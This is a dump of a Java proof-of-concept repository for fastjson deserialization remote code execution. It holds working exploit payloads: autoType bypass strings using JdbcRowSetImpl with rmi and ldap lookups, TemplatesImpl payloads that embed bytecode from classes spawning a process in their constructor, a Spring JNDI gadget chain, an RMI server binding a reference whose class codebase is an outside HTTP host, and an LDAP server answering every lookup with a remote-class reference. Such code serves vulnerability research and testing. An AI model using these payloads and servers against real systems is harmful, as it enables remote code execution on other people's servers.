8 | */ 9 | public class OtherPoC { 10 | public static void main(String[] argv){ 11 | //testUnicode(); 12 | testJdbcRowSetImpl(); 13 | } 14 | public static void testJdbcRowSetImpl() { 15 | ParserConfig.getGlobalInstance().setAutoTypeSupport(true); 16 | //1.2.41 bypass 17 | String payload = "{\"@type\":\"Lcom.sun.rowset.RowSetImpl;\",\"dataSourceName\":\"rmi://localhost:1099/Exploit\"," + 18 | " \"autoCommit\":true}"; 19 | //1.2.43 20 | String payload3 = "{\"@type\":\"[com.sun.rowset.JdbcRowSetImpl\"[{\"dataSourceName\":\"rmi://127.0.0.1:1099/Exploit\",\"autoCommit\":true]} ";//1.2.43 21 | //1.2.42 22 | String payload2 = "{\"@type\":\"LL\u0063\u006f\u006d.sun.rowset.JdbcRowSetImpl;;\",\"dataSourceName\":\"rmi://localhost:1099/Exploit\"," + 23 | " \"autoCommit\":true}"; 24 | //1.2.44 尝试 failed 25 | /* String payload = "{\"@type\":\"c\u0063\u006f\u006d.sun.rowset/JdbcRowSetImpl\",\"dataSourceName\":\"rmi://localhost:1099/Exploit\"," + 26 | " \"autoCommit\":true}"; 27 | String payload = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://localhost:389/Exploit\"," + 28 | " \"autoCommit\":true}"; 29 | String payload = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://localhost:1099/Exploit\"," + 30 | " \"autoCommit\":true}";*/ 31 | 32 | JSON.parse(payload); 33 | JSON.parse(payload2); 34 | JSON.parse(payload3); 35 | } 36 | } 37 | -------------------------------------------------------------------------------- /src/main/java/person/Person.java: -------------------------------------------------------------------------------- 1 | package person; 2 | 3 | /** 4 | * Created by web on 2017/4/18. 
5 | */ 6 | import java.io.Serializable; 7 | 8 | @SuppressWarnings("serial") 9 | public class Person implements Serializable{ 10 | private String name; 11 | private int age; 12 | public Person(){ 13 | System.out.println("in no param constructor"); 14 | } 15 | public Person(String str, int n){ 16 | System.out.println("Inside Person's Constructor"); 17 | name = str; 18 | age = n; 19 | } 20 | String getName(){ 21 | System.out.println("in getName"); 22 | return name; 23 | } 24 | void setName(String str){ 25 | System.out.println("in setname"); 26 | this.name = str; 27 | } 28 | 29 | void setAge(int age){ 30 | System.out.println("in setAge"); 31 | this.age = age; 32 | } 33 | int getAge(){ 34 | System.out.println("in getAge"); 35 | return age; 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /src/main/java/person/Poc.java: -------------------------------------------------------------------------------- 1 | package person; 2 | 3 | import com.alibaba.fastjson.JSON; 4 | import com.alibaba.fastjson.parser.Feature; 5 | import com.alibaba.fastjson.parser.ParserConfig; 6 | 7 | import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; 8 | import org.apache.commons.io.IOUtils; 9 | import org.apache.commons.codec.binary.Base64; 10 | 11 | import java.io.ByteArrayOutputStream; 12 | import java.io.File; 13 | import java.io.FileInputStream; 14 | import java.io.IOException; 15 | 16 | /** 17 | * Created by web on 2017/4/29. 
18 | */ 19 | public class Poc { 20 | 21 | public static String readClass(String cls){ 22 | ByteArrayOutputStream bos = new ByteArrayOutputStream(); 23 | try { 24 | IOUtils.copy(new FileInputStream(new File(cls)), bos); 25 | } catch (IOException e) { 26 | e.printStackTrace(); 27 | } 28 | return Base64.encodeBase64String(bos.toByteArray()); 29 | 30 | } 31 | 32 | public static void test_autoTypeDeny() throws Exception { 33 | ParserConfig config = new ParserConfig(); 34 | final String fileSeparator = System.getProperty("file.separator"); 35 | final String evilClassPath = System.getProperty("user.dir") + "\\target\\classes\\person\\Test.class"; 36 | String evilCode = readClass(evilClassPath); 37 | final String NASTY_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"; 38 | String text1 = "{\"@type\":\"" + NASTY_CLASS + 39 | "\",\"_bytecodes\":[\""+evilCode+"\"]," + 40 | "'_name':'a.b'," + 41 | "'_tfactory':{ }," + 42 | "\"_outputProperties\":{ }}\n"; 43 | System.out.println(text1); 44 | //String personStr = "{'name':"+text1+",'age':19}"; 45 | //Person obj = JSON.parseObject(personStr, Person.class, config, Feature.SupportNonPublicField); 46 | Object obj = JSON.parseObject(text1, Object.class, config, Feature.SupportNonPublicField); 47 | //assertEquals(Model.class, obj.getClass()); 48 | 49 | } 50 | 51 | public static void main(String args[]){ 52 | 53 | try { 54 | test_autoTypeDeny(); 55 | } catch (Exception e) { 56 | e.printStackTrace(); 57 | } 58 | } 59 | } 60 | -------------------------------------------------------------------------------- /src/main/java/person/Poc1.java: -------------------------------------------------------------------------------- 1 | package person; 2 | 3 | /** 4 | * Created by web on 2017/6/11. 
5 | */
6 | import com.alibaba.fastjson.JSON;
7 | import com.alibaba.fastjson.parser.Feature;
8 | import com.alibaba.fastjson.parser.ParserConfig;
9 |
10 | import org.apache.xalan.xsltc.trax.TemplatesImpl;
11 | import org.apache.commons.io.IOUtils;
12 |
13 | import org.apache.commons.codec.binary.Base64;
14 |
15 | import java.io.ByteArrayOutputStream;
16 | import java.io.File;
17 | import java.io.FileInputStream;
18 | import java.io.IOException;
19 |
20 | /**
21 | * Created by web on 2017/4/29.
22 | * Variant of Poc that targets the standalone Xalan TemplatesImpl (org.apache.xalan) and parses a second, Spring-typed document.
23 | */
23 | public class Poc1{
24 |
25 | public static String readClass(String cls){ // reads the file at cls and returns its contents base64-encoded
26 | ByteArrayOutputStream bos = new ByteArrayOutputStream();
27 | try {
28 | IOUtils.copy(new FileInputStream(new File(cls)), bos); // the FileInputStream is never closed
29 | } catch (IOException e) {
30 | e.printStackTrace(); // only printed: a missing file yields the base64 of an empty buffer
31 | }
32 | return Base64.encodeBase64String(bos.toByteArray());
33 |
34 | }
35 |
36 | public static void test_autoTypeDeny() throws Exception { // builds text1 (printed only) and parses text2
37 | ParserConfig config = new ParserConfig(); // unused: the parse on line 52 does not receive it
38 | final String fileSeparator = System.getProperty("file.separator"); // unused: the path below hard-codes Windows separators
39 | //ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
40 | final String evilClassPath = System.getProperty("user.dir") + "\\target\\classes\\person\\Test1.class"; // compiled Test1.java (its constructor spawns a process)
41 | String evilCode = readClass(evilClassPath);
42 | final String NASTY_CLASS = "org.apache.xalan.xsltc.trax.TemplatesImpl"; // standalone Xalan copy, not the JDK-internal one used in Poc
43 | String text1 = "{\"@type\":\"" + NASTY_CLASS +
44 | "\",\"_bytecodes\":[\""+evilCode+"\"],'_name':'a.b','_tfactory':{ },\"_outputProperties\":{ }," +
45 | "\"_name\":\"a\",\"_version\":\"1.0\",\"allowedProtocols\":\"all\"}\n";
46 |
47 | System.out.println(text1); // text1 is only printed, never parsed (see line 53)
48 | //String text2 = "Set[{\"@type\":\"org.springframework.aop.target.HotSwappableTargetSource\",\"static\":false,\"target\":{\"@type\":\"org.apache.xbean.naming.context.ContextUtil$ReadOnlyBinding\",\"className\":\"foo\",\"name\":\"foo\"}},{\"@type\":\"org.springframework.aop.target.HotSwappableTargetSource\"}]";
49 | String text2 = // second document typed as Spring AOP/JNDI beans and carrying ldap://localhost:1389/obj; presumably resolved through JNDI on the parsing side — an outbound LDAP connection to 1389 is the observable signal
"Set[{\"@type\":\"org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor\",\"beanFactory\":{\"@type\":\"org.springframework.jndi.support.SimpleJndiBeanFactory\",\"shareableResources\":[\"ldap://localhost:1389/obj\"]},\"adviceBeanName\":\"ldap://localhost:1389/obj\"},{\"@type\":\"org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor\",}] \n";
50 | //String personStr = "{'name':"+text1+",'age':19}";
51 | //Person obj = JSON.parseObject(personStr, Person.class, config, Feature.SupportNonPublicField);
52 | Object obj = JSON.parseObject(text2, Object.class, Feature.SupportNonPublicField); // no ParserConfig argument: whatever configuration fastjson applies by default governs @type here; obj is never inspected
53 | //Object obj = JSON.parseObject(text1, Object.class);
54 | //assertEquals(Model.class, obj.getClass());
55 |
56 | }
57 | public static void test_serilize_deserialize(){ // round-trips a Person through JSON; the constructor values are overwritten by the setters before serializing
58 | Person p = new Person("liming",12);
59 | p.setName("liming");
60 | p.setAge(19);
61 | String jsonString = JSON.toJSONString(p);
62 | System.out.println(jsonString);
63 | Person p1 = JSON.parseObject(jsonString,Person.class); // p1 is never used
64 | }
65 | public static void main(String args[]){ // runs both tests in order and prints any exception
66 | try {
67 | test_serilize_deserialize();
68 | test_autoTypeDeny();
69 | } catch (Exception e) {
70 | e.printStackTrace();
71 | }
72 | }
73 | }
74 |
-------------------------------------------------------------------------------- /src/main/java/person/SerializeToFlatFile.java: --------------------------------------------------------------------------------
1 | package person;
2 |
3 | /**
4 | * Created by web on 2017/4/18.
5 | */
6 | import java.io.FileInputStream;
7 | import java.io.FileOutputStream;
8 | import java.io.ObjectInputStream;
9 | import java.io.ObjectOutputStream;
10 |
11 | // Writes one Person to myPerson.txt with Java serialization and reads it back.
12 | public class SerializeToFlatFile {
13 | public static void main(String[] args) { // save, then restore, in one run
14 | SerializeToFlatFile ser = new SerializeToFlatFile();
15 | ser.savePerson();
16 | ser.restorePerson();
17 | }
18 |
19 | public void savePerson(){ // serializes a fixed Person("Jay",24) to myPerson.txt in the working directory
20 | Person myPerson = new Person("Jay",24);
21 | try {
22 | FileOutputStream fos = new FileOutputStream("myPerson.txt"); // closed only indirectly via oos.close(); leaks if an exception occurs before line 30
23 | ObjectOutputStream oos = new ObjectOutputStream(fos);
24 | System.out.println("Person--Jay,24---Written");
25 | System.out.println("Name is: "+myPerson.getName());
26 | System.out.println("Age is: "+myPerson.getAge());
27 |
28 | oos.writeObject(myPerson);
29 | oos.flush();
30 | oos.close();
31 | } catch (Exception e) {
32 | // TODO: handle exception
33 | e.printStackTrace();
34 | }
35 | }
36 |
37 | public void restorePerson() { // deserializes myPerson.txt and prints the Person; any failure is only printed
38 | try {
39 | FileInputStream fis = new FileInputStream("myPerson.txt"); // neither fis nor ois is ever closed
40 | ObjectInputStream ois = new ObjectInputStream(fis); // unfiltered ObjectInputStream: the file content decides which classes are instantiated before the cast on line 42 runs; if this pattern is reused on untrusted files, restrict it with a deserialization filter
41 |
42 | Person myPerson = (Person)ois.readObject();
43 | System.out.println("\n--------------------\n");
44 | System.out.println("Person--Jay,24---Restored");
45 | System.out.println("Name is: "+myPerson.getName());
46 | System.out.println("Age is: "+myPerson.getAge());
47 | } catch (Exception e) {
48 | // TODO: handle exception
49 | e.printStackTrace();
50 | }
51 | }
52 | }
-------------------------------------------------------------------------------- /src/main/java/person/Test.java: --------------------------------------------------------------------------------
1 | package person;
2 |
3 | /**
4 | * Created by web on 2017/4/29.
5 | */
6 | import com.sun.org.apache.xalan.internal.xsltc.DOM;
7 | import com.sun.org.apache.xalan.internal.xsltc.TransletException;
8 | import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
9 | import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
10 | import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
11 |
12 | import java.io.IOException;
13 |
14 | public class Test extends AbstractTranslet { // translet stub against the JDK-internal Xalan classes; its only behaviour is the constructor side effect, both transform overrides are empty
15 | public Test() throws IOException {
16 | Runtime.getRuntime().exec("calc"); // runs at instantiation: this is the effect a deserialization sink must never be able to reach; a JVM spawning a child process while parsing input is the detection signal
17 | }
18 |
19 | @Override
20 | public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) { // no-op
21 | }
22 |
23 | @Override
24 | public void transform(DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] handlers) throws TransletException { // no-op
25 |
26 | }
27 |
28 | public static void main(String[] args) throws Exception { // local run of the constructor; t is unused
29 | Test t = new Test();
30 | }
31 | }
-------------------------------------------------------------------------------- /src/main/java/person/Test1.java: --------------------------------------------------------------------------------
1 | package person;
2 |
3 | /**
4 | * Created by web on 2017/6/11.
5 | */
6 | import org.apache.xalan.xsltc.runtime.AbstractTranslet;
7 | import org.apache.xalan.xsltc.DOM;
8 | import org.apache.xalan.xsltc.TransletException;
9 | import org.apache.xml.dtm.DTMAxisIterator;
10 | import org.apache.xml.serializer.SerializationHandler;
11 |
12 | import java.io.IOException;
13 |
14 | public class Test1 extends AbstractTranslet { // same stub as Test, but built against the standalone Xalan (org.apache.xalan) classes that Poc1 names
15 | public Test1() throws IOException {
16 | Runtime.getRuntime().exec("calc"); // runs at instantiation; see Test for the detection angle
17 | }
18 |
19 | @Override
20 | public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) { // no-op
21 | }
22 |
23 | @Override
24 | public void transform(DOM document, org.apache.xml.serializer.SerializationHandler[] handlers) throws TransletException { // no-op
25 |
26 | }
27 |
28 | public static void main(String[] args) throws Exception { // local run of the constructor; t is unused
29 | Test1 t = new Test1();
30 | }
31 | }
-------------------------------------------------------------------------------- /src/main/java/person/TestFastjson.java: --------------------------------------------------------------------------------
1 | package person;
2 |
3 | import com.alibaba.fastjson.JSON;
4 | import com.alibaba.fastjson.parser.Feature;
5 | import com.alibaba.fastjson.parser.ParserConfig;
6 |
7 | import java.io.IOException;
8 | import java.util.HashMap;
9 | import java.util.Map;
10 |
11 | import static java.lang.Runtime.*;
12 |
13 | /**
14 | * Created by liaoxinxi on 2017-6-5.
15 | */
16 | public class TestFastjson { // serializes a map that holds a live Process object
17 | public static void main(String args[]){
18 | ParserConfig config = new ParserConfig(); // unused
19 | HashMap map = new HashMap(); // raw type
20 | map.put("1", new Integer(1));
21 | map.put("2", new Integer(2));
22 | try {
23 | map.put("3", getRuntime().exec("ping -n 3 192.168.3.103")); // spawns ping (Windows -n syntax) against a LAN address and stores the Process itself as a value
24 | } catch (IOException e) {
25 | e.printStackTrace();
26 | }
27 | System.out.println(JSON.toJSONString(map)); // the Process object is serialized here — presumably through its getters; confirm what the output exposes
28 |
29 | }
30 |
31 | }
32 |
-------------------------------------------------------------------------------- /src/main/java/person/TestJNDI.java: --------------------------------------------------------------------------------
1 | package person;
2 |
3 | import javax.naming.*;
4 | import javax.naming.directory.DirContext;
5 | import javax.naming.directory.InitialDirContext;
6 | import java.util.Hashtable;
7 |
8 |
9 | /**
10 | * Created by liaoxinxi on 2017-9-5.
11 | * JNDI client side: looks up names on the local LDAP (1389) and RMI (1099) listeners started by the classes in person.server.
12 | */
12 | public class TestJNDI {
13 | public static void testLdap(){ // connects to the local LDAP listener and looks up "e"; the result is cast to Reference and discarded
14 | String url = "ldap://127.0.0.1:1389";
15 | Hashtable env = new Hashtable(); // raw type
16 | env.put(Context.INITIAL_CONTEXT_FACTORY,"com.sun.jndi.ldap.LdapCtxFactory");
17 | env.put(Context.PROVIDER_URL, url);
18 | try{
19 | DirContext dirContext = new InitialDirContext(env);
20 | System.out.println("connected");
21 | System.out.println(dirContext.getEnvironment());
22 | Reference e = (Reference) dirContext.lookup("e");
23 |
24 | }catch(NameNotFoundException ex){
25 | ex.printStackTrace();
26 | }catch(Exception e){
27 | e.printStackTrace();
28 | }
29 | }
30 | public static void testRmi() throws NamingException { // looks up "Exploit" twice: relative to the registry context, then by absolute URL
31 | String url = "rmi://127.0.0.1:1099";
32 | Hashtable env = new Hashtable(); // raw type
33 | env.put(Context.PROVIDER_URL, url);
34 | env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory");
35 | Context context = new InitialContext(env);
36 | Object object = context.lookup("Exploit");//ok
37 | Object object1 = context.lookup("rmi://127.0.0.1/Exploit"); // object1 is never used
38 | System.out.println("Object:" + object);
39 | }
40 | public static void main(String[] argv) throws NamingException { // only testRmi runs; testLdap is never called
41 | testRmi();
42 |
43 | }
44 | }
45 |
-------------------------------------------------------------------------------- /src/main/java/person/server/JNDIServer.java: --------------------------------------------------------------------------------
1 | package person.server;
2 |
3 | import com.sun.jndi.rmi.registry.ReferenceWrapper;
4 |
5 | import javax.naming.NamingException;
6 | import javax.naming.Reference;
7 | import java.rmi.AlreadyBoundException;
8 | import java.rmi.RemoteException;
9 | import java.rmi.registry.LocateRegistry;
10 | import java.rmi.registry.Registry;
11 |
12 | /**
13 | * Created by liaoxinxi on 2017-11-6.
14 | * In-process RMI registry that binds a single javax.naming.Reference under "Exploit"; the reference's factory location is a remote HTTP codebase, so a client that resolves it fetches a class over HTTP — that outbound GET is what a defender would look for.
15 | */
16 | public class JNDIServer {
17 | public static void start() throws
18 | AlreadyBoundException, RemoteException, NamingException {
19 | Registry registry = LocateRegistry.createRegistry(1099); // registry on the fixed port 1099 that TestJNDI.testRmi connects to
20 | // http://xxlegend.com/Exploit.class is sufficient
21 | // factoryLocation must be the IP followed by a slash; the slash is mandatory — without it the request to the web server becomes GET / instead of the expected GET /Exploit.class
22 | Reference reference = new Reference("Exploit", // Reference(className, factory, factoryLocation)
23 | "Exploit","http://104.251.228.50/");
24 | ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
25 | registry.bind("Exploit",referenceWrapper); // throws AlreadyBoundException on a second start()
26 |
27 | }
28 | public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException {
29 | start();
30 | }
31 | }
32 |
-------------------------------------------------------------------------------- /src/main/java/person/server/LdapServer.java: --------------------------------------------------------------------------------
1 | package person.server;
2 |
3 |
4 | import java.net.InetAddress;
5 | import java.net.MalformedURLException;
6 | import java.net.URL;
7 |
8 | import javax.net.ServerSocketFactory;
9 | import javax.net.SocketFactory;
10 | import javax.net.ssl.SSLSocketFactory;
11 |
12 | import com.unboundid.ldap.listener.InMemoryDirectoryServer;
13 | import
com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
14 | import com.unboundid.ldap.listener.InMemoryListenerConfig;
15 | import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
16 | import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
17 | import com.unboundid.ldap.sdk.Entry;
18 | import com.unboundid.ldap.sdk.LDAPException;
19 | import com.unboundid.ldap.sdk.LDAPResult;
20 | import com.unboundid.ldap.sdk.ResultCode;
21 |
22 |
23 | /**
24 | * LDAP server implementation returning JNDI references
25 | * Every search, whatever its filter, is answered with one javaNamingReference entry whose javaCodeBase and javaFactory come from the URL given on the command line. A JNDI client that follows such a reference loads a class from that codebase; this is the behaviour the JDK's com.sun.jndi.ldap.object.trustURLCodebase=false default blocks on the client side.
26 | *
27 | * @author mbechler
28 | *
29 | */
29 | public class LdapServer {
30 |
31 | private static final String LDAP_BASE = "dc=example,dc=com"; // base DN of the in-memory directory
32 |
33 |
34 | public static void main ( String[] args ) { // args[0]: URL with a '#' fragment naming the class; args[1] (optional): listen port, default 1389
35 | int port = 1389;
36 | if ( args.length < 1 || args[ 0 ].indexOf('#') < 0 ) {
37 | System.err.println(LdapServer.class.getSimpleName() + " []"); //$NON-NLS-1$ // the bracketed argument names appear to have been stripped from this usage string by markup — confirm against upstream
38 | System.exit(-1);
39 | }
40 | else if ( args.length > 1 ) {
41 | port = Integer.parseInt(args[ 1 ]); // NumberFormatException on a non-numeric port is not caught
42 | }
43 |
44 | try {
45 | InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);
46 | config.setListenerConfigs(new InMemoryListenerConfig(
47 | "listen", //$NON-NLS-1$
48 | InetAddress.getByName("0.0.0.0"), //$NON-NLS-1$ // binds to all interfaces, not just loopback
49 | port,
50 | ServerSocketFactory.getDefault(),
51 | SocketFactory.getDefault(),
52 | (SSLSocketFactory) SSLSocketFactory.getDefault()));
53 |
54 | config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(args[ 0 ]))); // MalformedURLException lands in the catch below
55 | InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
56 | System.out.println("Listening on 0.0.0.0:" + port); //$NON-NLS-1$
57 | ds.startListening();
58 |
59 | }
60 | catch ( Exception e ) {
61 | e.printStackTrace();
62 | }
63 | }
64 |
65 | private static class OperationInterceptor extends InMemoryOperationInterceptor { // rewrites every search result into a single reference entry
66 |
67 | private URL codebase; // the command-line URL; its fragment names the factory class
68 |
69 |
70 | /**
71 | * Creates an interceptor that answers every search with a reference built from {@code cb}.
72 | */
73 | public OperationInterceptor ( URL cb ) {
74 | this.codebase = cb;
75 | }
76 |
77 |
78 | /**
79 | * {@inheritDoc}
80 | * Builds an empty entry at the request's base DN and delegates to sendResult; any failure is only printed.
81 | * @see com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult)
82 | */
83 | @Override
84 | public void processSearchResult ( InMemoryInterceptedSearchResult result ) {
85 | String base = result.getRequest().getBaseDN();
86 | Entry e = new Entry(base);
87 | try {
88 | sendResult(result, base, e);
89 | }
90 | catch ( Exception e1 ) {
91 | e1.printStackTrace();
92 | }
93 |
94 | }
95 |
96 |
97 | protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws LDAPException, MalformedURLException { // fills e with the javaNamingReference attributes and sends it as the sole search entry
98 | URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class")); // fragment with dots turned to slashes plus ".class"; used only for the log line below
99 | System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl);
100 | e.addAttribute("javaClassName", "Exploit"); // fixed class name, independent of the fragment
101 | String cbstring = this.codebase.toString();
102 | int refPos = cbstring.indexOf('#');
103 | if ( refPos > 0 ) {
104 | cbstring = cbstring.substring(0, refPos); // strip the '#fragment'
105 | }
106 | e.addAttribute("javaCodeBase", cbstring); // codebase without the fragment
107 | e.addAttribute("objectClass", "javaNamingReference"); //$NON-NLS-1$
108 | e.addAttribute("javaFactory", this.codebase.getRef()); // raw fragment as the factory name
109 | result.sendSearchEntry(e);
110 | result.setResult(new LDAPResult(0, ResultCode.SUCCESS)); // message id 0, success
111 | }
112 |
113 | }
114 | }
115 |
-------------------------------------------------------------------------------- /target/classes/person/Exploit1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/classes/person/Exploit1.class -------------------------------------------------------------------------------- /target/classes/person/JdbcRowSetImplPoc.class: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/classes/person/JdbcRowSetImplPoc.class -------------------------------------------------------------------------------- /target/classes/person/Person.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/classes/person/Person.class -------------------------------------------------------------------------------- /target/classes/person/Poc.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/classes/person/Poc.class -------------------------------------------------------------------------------- /target/classes/person/Poc1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/classes/person/Poc1.class -------------------------------------------------------------------------------- /target/classes/person/SerializeToFlatFile.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/classes/person/SerializeToFlatFile.class -------------------------------------------------------------------------------- /target/classes/person/Test.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/classes/person/Test.class 
-------------------------------------------------------------------------------- /target/classes/person/Test1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/classes/person/Test1.class -------------------------------------------------------------------------------- /target/classes/person/TestFastjson.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/classes/person/TestFastjson.class -------------------------------------------------------------------------------- /target/classes/person/TestJNDI.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/classes/person/TestJNDI.class -------------------------------------------------------------------------------- /target/classes/person/server/JNDIServer.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/classes/person/server/JNDIServer.class -------------------------------------------------------------------------------- /target/classes/person/server/LdapServer$OperationInterceptor.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/classes/person/server/LdapServer$OperationInterceptor.class -------------------------------------------------------------------------------- /target/classes/person/server/LdapServer.class: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/classes/person/server/LdapServer.class -------------------------------------------------------------------------------- /target/fastjson-poc-1.0-SNAPSHOT-jar-with-dependencies.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/fastjson-poc-1.0-SNAPSHOT-jar-with-dependencies.jar -------------------------------------------------------------------------------- /target/fastjson-poc-1.0-SNAPSHOT.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/fastjson-poc-1.0-SNAPSHOT.jar -------------------------------------------------------------------------------- /target/maven-archiver/pom.properties: -------------------------------------------------------------------------------- 1 | #Generated by Maven 2 | #Tue Sep 05 16:32:58 CST 2017 3 | version=1.0-SNAPSHOT 4 | groupId=com.xxlengend 5 | artifactId=fastjson-poc 6 | -------------------------------------------------------------------------------- /target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst -------------------------------------------------------------------------------- /target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst: 
-------------------------------------------------------------------------------- 1 | D:\quick_response\fastjson\fastjson-remote-code-execute-poc\src\main\java\person\Person.java 2 | D:\quick_response\fastjson\fastjson-remote-code-execute-poc\src\main\java\person\Poc.java 3 | D:\quick_response\fastjson\fastjson-remote-code-execute-poc\src\main\java\person\Test1.java 4 | D:\quick_response\fastjson\fastjson-remote-code-execute-poc\src\main\java\person\Poc1.java 5 | D:\quick_response\fastjson\fastjson-remote-code-execute-poc\src\main\java\person\Test.java 6 | D:\quick_response\fastjson\fastjson-remote-code-execute-poc\src\main\java\person\server\LdapServer.java 7 | D:\quick_response\fastjson\fastjson-remote-code-execute-poc\src\main\java\person\Poc2.java 8 | D:\quick_response\fastjson\fastjson-remote-code-execute-poc\src\main\java\person\SerializeToFlatFile.java 9 | D:\quick_response\fastjson\fastjson-remote-code-execute-poc\src\main\java\person\TestFastjson.java 10 | D:\quick_response\fastjson\fastjson-remote-code-execute-poc\src\main\java\person\exploit.java 11 | -------------------------------------------------------------------------------- /test.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | --------------------------------------------------------------------------------